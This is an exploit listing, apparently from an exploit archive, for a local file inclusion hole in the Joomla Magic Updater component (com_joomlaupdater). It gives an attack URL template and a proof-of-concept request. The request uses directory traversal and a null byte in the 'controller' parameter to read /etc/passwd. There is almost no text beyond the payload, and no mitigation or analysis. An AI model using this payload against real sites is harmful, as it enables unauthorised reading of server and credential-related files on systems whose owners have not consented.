id: 11631
date: 04/05/2010
title: Joomla Magic Updater com_joomlaupdater LFI Vulnerability
author: Vrs-hCk
cves: 

========================================================
Joomla Magic Updater com_joomlaupdater LFI Vulnerability
========================================================

================================================================================================
 
 [+] Exploit
 
     http://[site]/[path]/index.php?option=com_joomlaupdater&controller=[LFI]
 
 [+] PoC
 
     http://localhost/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00
 
 ================================================================================================



#  0day.today [2023-03-22]  #